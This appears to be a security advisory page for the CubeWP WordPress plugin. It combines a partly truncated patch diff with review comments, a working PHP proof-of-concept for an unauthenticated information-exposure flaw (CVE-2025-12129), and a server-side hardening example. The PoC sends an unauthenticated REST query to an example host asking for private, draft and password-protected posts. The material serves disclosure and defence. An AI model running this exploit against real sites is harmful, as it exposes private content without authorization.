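Review bot: the justification on the phpcs:ignore ("Read-only use of query vars to render notice") is copied from the alerts class; here the value selects a search template, so reword it to describe this use. sanitize_text_field() is fine, though sanitize_key() better matches a post type slug.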
--- a/cubewp-framework/cube/classes/class-cubewp-frontend.php
+++ b/cubewp-framework/cube/classes/class-cubewp-frontend.php
@@ -421,6 +421,7 @@
             </div>
         </div>';

+        // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped
         echo apply_filters('cubewp/frontend/archive/list/switcher', $output);
     }

@@ -449,11 +450,13 @@
             'class'        => 'cwp-orderby',
             'id'           => 'cwp-sorting-filter',
             'name'         => 'cwp_orderby',
-            'value'        => isset($_GET['orderby']) && !empty($_GET['orderby']) ? sanitize_text_field($_GET['orderby']) : 'DESC',
+            // phpcs:ignore WordPress.Security.NonceVerification.Recommended -- Read-only use of query vars to render notice; no state change performed.
+            'value'        => isset($_GET['orderby']) && !empty($_GET['orderby']) ? sanitize_text_field(wp_unslash($_GET['orderby'])) : 'DESC',
             'options'      => $option,
             'extra_attrs'  => '',
             'placeholder'  => esc_html__('Sort By','cubewp-framework')
         );
+        // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped
         echo cwp_render_dropdown_input( $input_attrs );
     }
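Review bot: the phpcs:ignore justification about rendering a notice is again copied from elsewhere; this code reads orderby for a sort dropdown, so say so. The `echo cwp_render_dropdown_input( ... )` is now suppressed rather than escaped, so the suppression should state that cwp_render_dropdown_input() escapes its own output.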

--- a/cubewp-framework/cube/classes/class-cubewp-import.php
+++ b/cubewp-framework/cube/classes/class-cubewp-import.php
@@ -1,5 +1,4 @@
 <?php
-
 /**
  * CubeWp Import to import only cubewp related data.
  *
@@ -7,6 +6,8 @@
  * @package cubewp/cube/classes
  */

+// phpcs:disable WordPress.NamingConventions.PrefixAllGlobals
+
 if (! defined('ABSPATH')) {
     exit;
 }
@@ -23,8 +24,10 @@
         add_action('cubewp_import', array($this, 'manage_import'));
         add_action('wp_ajax_cwp_import_data', array($this, 'cwp_import_data_callback'));
         add_action('wp_ajax_cwp_import_dummy_data', array($this, 'cwp_import_dummy_data_callback'));
-        if (isset($_GET['import']) && $_GET['import'] == 'success') {
-            new CubeWp_Admin_Notice("cubewp-import-success", esc_html__('Data Imported Successfully', 'cubewp-framework'), 'success', false);
+        $cwp_import_flag  = isset( $_GET['import'] ) ? sanitize_key( wp_unslash( $_GET['import'] ) ) : '';
+        $cwp_import_nonce = isset( $_GET['security_nonce'] ) ? sanitize_text_field( wp_unslash( $_GET['security_nonce'] ) ) : '';
+        if ( 'success' === $cwp_import_flag && $cwp_import_nonce && wp_verify_nonce( $cwp_import_nonce, 'cwp_import_data_nonce' ) ) {
+            new CubeWp_Admin_Notice( 'cubewp-import-success', esc_html__( 'Data Imported Successfully', 'cubewp-framework' ), 'success', false );
         }
     }
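Review bot: requiring a valid 'cwp_import_data_nonce' before showing the success notice closes the spoofable `?import=success` notice; since wp_verify_nonce() returns false for an empty token, the separate `$cwp_import_nonce &&` test is redundant but harmless. The same flag/nonce parsing is duplicated in manage_import() below, so a small private helper would keep the two in step.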

@@ -46,8 +49,12 @@
      */
     public function manage_import()
     {
-        if (isset($_GET['import']) && $_GET['import'] == 'success' && isset($_SESSION['terms'])) {
-            $this->cwp_import_terms(cubewp_core_data($_SESSION['terms']));
+        $cwp_import_flag  = isset( $_GET['import'] ) ? sanitize_key( wp_unslash( $_GET['import'] ) ) : '';
+        $cwp_import_nonce = isset( $_GET['security_nonce'] ) ? sanitize_text_field( wp_unslash( $_GET['security_nonce'] ) ) : '';
+        if ( 'success' === $cwp_import_flag && $cwp_import_nonce && wp_verify_nonce( $cwp_import_nonce, 'cwp_import_data_nonce' ) && isset( $_SESSION['terms'] ) ) {
+            // The imported terms payload is sanitized inside cubewp_core_data().
+            // phpcs:ignore WordPress.Security.ValidatedSanitizedInput.InputNotSanitized
+            $this->cwp_import_terms( cubewp_core_data( $_SESSION['terms'] ) );
             session_destroy();
         }
 ?>
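Review bot: the nonce check now gates the term import, but the import still runs on a page load driven by query vars and $_SESSION['terms'] and then calls session_destroy(); a nonce in a GET URL ends up in access logs and Referer headers, and PHP sessions are not normally started in WordPress. Finishing the term import inside the AJAX handler that already verified the nonce, and passing only a status flag in the redirect, would remove the session dependency. The comment that cubewp_core_data() sanitizes the payload is carrying the whole InputNotSanitized suppression, so make sure it is accurate.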
@@ -61,7 +68,7 @@
             </div>
             <form id="import_form" method="post" action="" enctype="multipart/form-data">
                 <input type="hidden" name="action" value="cwp_import_data">
-                <input type="hidden" name="cwp_import_nonce" value="<?php echo wp_create_nonce('cwp_import_data_nonce'); ?>">
+                <input type="hidden" name="cwp_import_nonce" value="<?php echo esc_attr(wp_create_nonce('cwp_import_data_nonce')); ?>">
                 <div class="cubewp-import-box-container">
                     <div class="cubewp-import-box">
                         <div class="cubewp-import-card">
@@ -92,7 +99,7 @@
                             </div>
                         </div>
                         <button type="submit" class="button-primary cwp_import_demo" name="cwp_import">
-                            <?php esc_html_e('Import', 'cubewp'); ?>
+                            <?php esc_html_e('Import', 'cubewp-framework'); ?>
                         </button>
                     </div>
                 </div>
@@ -123,10 +130,11 @@
             if (is_dir($file_path)) {
                 $this->rmdir_recursive($file_path); // Recursive call
             } else {
-                unlink($file_path); // Delete file
+                wp_delete_file($file_path); // Delete file
             }
         }

+        // phpcs:ignore WordPress.WP.AlternativeFunctions.file_system_operations_rmdir
         return rmdir($dir); // Remove directory and return result
     }
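Review bot: wp_delete_file() does not return a status, so unlike unlink() the loop can no longer tell whether a file was actually removed; the only remaining signal is the final rmdir(), which fails on a non-empty directory. Consider checking file_exists() after deletion, or at least documenting that the return value only reflects the rmdir().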
     /**
@@ -141,7 +149,7 @@
             // User doesn't have the required capabilities
             wp_send_json(array('success' => 'false', 'msg' => esc_html__("You do not have permission to perform this action.", 'cubewp-framework')));
         }
-        if (isset($_FILES["file"]["name"]) && isset($_POST['cwp_import_nonce']) && wp_verify_nonce($_POST['cwp_import_nonce'], 'cwp_import_data_nonce')) {
+        if (isset($_FILES["file"]["name"]) && isset($_POST['cwp_import_nonce']) && wp_verify_nonce(sanitize_text_field(wp_unslash($_POST['cwp_import_nonce'])), 'cwp_import_data_nonce')) {
             $import_file = $_FILES;
             $filename = sanitize_file_name($import_file["file"]["name"]);
             $source = $import_file["file"]["tmp_name"];
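Review bot: unslashing and sanitizing the nonce before wp_verify_nonce() is fine. The upload itself only goes through sanitize_file_name(); nothing here checks that the file is actually a zip (the later basename($filename, '.zip') merely strips the suffix), so validate the type with wp_check_filetype() and reject anything else before moving it.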
@@ -165,6 +173,7 @@
             $upload_dir = wp_upload_dir();
             $path  = $upload_dir['path'] . '/cubewp/import/';  // absolute path to the directory where zipper.php is in
             if (! is_dir($path)) {
+                // phpcs:ignore WordPress.WP.AlternativeFunctions.file_system_operations_mkdir
                 mkdir($path, 0777, true);
             }
             $filenoext = basename($filename, '.zip');  // absolute path to the directory where zipper.php is in (lowercase)
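Review bot: mkdir($path, 0777, true) is kept behind a phpcs:ignore while the export class in this same patch moved to wp_mkdir_p(); use wp_mkdir_p() here as well and drop the world-writable 0777 mode, which is unnecessary under wp-content/uploads.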
@@ -178,17 +187,19 @@

             if (is_dir($targetdir))  $this->rmdir_recursive($targetdir);

+            // phpcs:ignore WordPress.WP.AlternativeFunctions.file_system_operations_mkdir
             mkdir($targetdir, 0777);

             /* here it is really happening */

+            // phpcs:ignore Generic.PHP.ForbiddenFunctions.Found
             if (move_uploaded_file($source, $targetzip)) {
                 $zip = new ZipArchive();
                 $x = $zip->open($targetzip);  // open the zip file to extract
                 if ($x === true) {
                     $zip->extractTo($targetdir); // place in the directory with same name
                     $zip->close();
-                    unlink($targetzip);
+                    wp_delete_file($targetzip);
                 }
                 $moved = true;
             } else {
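Review bot: same point on mkdir($targetdir, 0777) as above: prefer wp_mkdir_p() over a suppressed 0777 mkdir. Also, the uploaded archive is only deleted when ZipArchive::open() succeeds; when it fails, $targetzip remains in the uploads directory, so delete it on that path too.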
@@ -219,7 +230,7 @@
                 }
                 $message = !empty($message) ? $message : esc_html__('Data imported successfull.', 'cubewp-framework');
                 $this->rmdir_recursive($targetdir);
-                wp_send_json(array('success' => 'true', 'msg' => $message, 'redirectURL' => admin_url('admin.php?page=cubewp-import&import=success')));
+                wp_send_json(array('success' => 'true', 'msg' => $message, 'redirectURL' => admin_url('admin.php?page=cubewp-import&import=success&security_nonce='.wp_create_nonce('cwp_import_data_nonce'))));
             }

             wp_die();
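Review bot: adding the nonce to the redirect URL pairs with the checks in the constructor and manage_import(); fine. Unrelated but visible in the context line: the message 'Data imported successfull.' has a typo (successful) that would need a separate translation-string update.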
@@ -240,7 +251,7 @@
             wp_send_json(array('success' => 'false', 'msg' => esc_html__('You do not have permission to perform this action.', 'cubewp-framework')));
             wp_die();
         }
-        if (!isset($_POST['nonce']) || !wp_verify_nonce($_POST['nonce'], 'cubewp-admin-nonce')) {
+        if (!isset($_POST['nonce']) || !wp_verify_nonce(sanitize_text_field(wp_uns

Proof of Concept (PHP)

NOTICE:

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-12129 - CubeWP – All-in-One Dynamic Content Framework <= 1.1.27 - Unauthenticated Information Exposure

// The plugin's custom REST query route. No cookie or nonce is sent with the request.
$target_url = 'http://example.com/wp-json/cubewp-posts/v1/query';

// Payload to request posts, including private/draft/password-protected ones.
// The values are handed to WP_Query by the vulnerable endpoint as-is.
$payload = array(
    'post_type'      => 'post',           // Target post type
    'post_status'    => ['publish', 'private', 'draft', 'password'], // Attempt to get all statuses
    'has_password'   => null,             // null disables WP_Query's password filter entirely
    'posts_per_page' => 10,               // Number of posts to retrieve
    'fields'         => 'ids'             // Return post IDs; change to 'all' for full content
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($payload));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_TIMEOUT, 15);
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
    'Content-Type: application/json',
    'Accept: application/json'
));

$response = curl_exec($ch);
if ($response === false) {
    echo "[-] cURL error: " . curl_error($ch) . "\n";
    curl_close($ch);
    exit(1);
}
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

if ($http_code == 200) {
    $data = json_decode($response, true);
    if (is_array($data) && isset($data['posts']) && !empty($data['posts'])) {
        echo "[+] SUCCESS: Retrieved " . count($data['posts']) . " post(s).\n";
        echo "    Post IDs: " . implode(', ', $data['posts']) . "\n";
        // To get full content, re-run with 'fields' => 'all' and iterate through the returned posts.
    } else {
        echo "[-] No posts returned. The endpoint may be patched or no matching posts exist.\n";
    }
} else {
    echo "[-] Request failed with HTTP code: {$http_code}\n";
    echo "    Response: {$response}\n";
}
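The server-side check that stops a payload like the one above from widening the query, as an added example: this is not CubeWP's code and not the vendor's 1.1.28 fix. The `cwp_example_*` names, the allow-lists and the page-size cap are assumptions; `current_user_can('read_private_posts')` is the WordPress capability check the hardened endpoint would pass in, and the demonstration at the bottom runs under plain `php` on constructed input without WordPress.

```php
<?php
// Added example, not CubeWP's code: reduce the REST query arguments to what the
// caller is allowed to see before they reach WP_Query. All cwp_example_* names
// are hypothetical.

// Statuses an anonymous visitor may query. 'private', 'draft', 'pending',
// 'future', 'trash' and the 'any' shortcut are all dropped for them.
const CWP_EXAMPLE_PUBLIC_STATUSES = ['publish'];
// Statuses a user holding the read_private_posts capability may query.
const CWP_EXAMPLE_PRIVILEGED_STATUSES = ['publish', 'private', 'draft', 'pending', 'future'];
// Upper bound on posts_per_page for anonymous callers (assumed value).
const CWP_EXAMPLE_MAX_PER_PAGE = 50;

/**
 * Normalise post_status (string, comma list or array) and intersect it with the
 * allow-list for this caller. Unknown or disallowed values are discarded rather
 * than passed through; an empty result falls back to 'publish'.
 */
function cwp_example_allowed_statuses($requested, bool $can_read_private): array
{
    if (is_string($requested)) {
        $requested = array_map('trim', explode(',', $requested));
    }
    if (!is_array($requested)) {
        $requested = [];
    }
    $allowed  = $can_read_private ? CWP_EXAMPLE_PRIVILEGED_STATUSES : CWP_EXAMPLE_PUBLIC_STATUSES;
    $statuses = array_values(array_intersect(array_map('strval', $requested), $allowed));
    return $statuses ?: ['publish'];
}

/**
 * Apply the caller-dependent restrictions to the decoded request body.
 */
function cwp_example_harden_query_args(array $args, bool $can_read_private): array
{
    $args['post_status'] = cwp_example_allowed_statuses($args['post_status'] ?? 'publish', $can_read_private);

    if (!$can_read_private) {
        // has_password => false makes WP_Query return only posts without a
        // password; null, as in the PoC payload, would switch that filter off.
        $args['has_password'] = false;
        // Never honour -1 (unlimited) or an oversized page size from a visitor.
        $n = (int) ($args['posts_per_page'] ?? 10);
        $args['posts_per_page'] = ($n < 1) ? 10 : min($n, CWP_EXAMPLE_MAX_PER_PAGE);
    }
    return $args;
}

// Inside WordPress the endpoint callback would run this before building the query:
//   $args  = cwp_example_harden_query_args($request->get_json_params(),
//                                          current_user_can('read_private_posts'));
//   $query = new WP_Query($args);

// Stand-alone demonstration on constructed input: the PoC payload from above,
// once as an anonymous caller and once as a user with read_private_posts.
$poc_payload = [
    'post_type'      => 'post',
    'post_status'    => ['publish', 'private', 'draft', 'password'],
    'has_password'   => null,
    'posts_per_page' => -1,
    'fields'         => 'ids',
];
foreach (['anonymous' => false, 'read_private_posts' => true] as $who => $priv) {
    echo $who . ': ' . json_encode(cwp_example_harden_query_args($poc_payload, $priv)) . "\n";
}
```

For the anonymous caller the statuses collapse to `publish`, `has_password` is forced to `false` and `posts_per_page` becomes 10; the privileged caller keeps `private` and `draft` (the bogus `password` status is dropped in both cases) and its other arguments pass through unchanged. A per-result `current_user_can('read_post', $post_id)` check after the query is the natural second layer, since `read_private_posts` is a site-wide capability and does not express per-post ownership.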
